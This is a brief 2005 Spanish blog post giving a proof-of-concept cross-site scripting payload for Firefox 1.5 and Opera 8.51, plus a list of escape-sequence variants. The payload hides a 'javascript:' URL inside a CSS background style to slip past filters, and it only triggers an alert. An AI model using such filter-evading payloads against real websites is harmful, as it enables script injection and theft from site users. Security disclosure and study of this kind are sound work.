ecoestadistica.com

lunes, diciembre 05, 2005

Ataque XSS en Firefox 1.5 y Opera 8.51???

Prueba de Concepto:

/anytag
style="background:url("javascri\Dpt:/*/**/(function a()
{alert('JavaScript es ejecutado.')})();");"
//

otras variantes que se pueden utilizar:

Código:
"\d"
"\D"
"\0d"
"\00000d"
"\d "
"\00000d "
"\a"
"\9"
e.t.c.

afectaria a el Opera 8.51 y al Firefox 1.5, testeado con windows XP SP2

Salu2

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com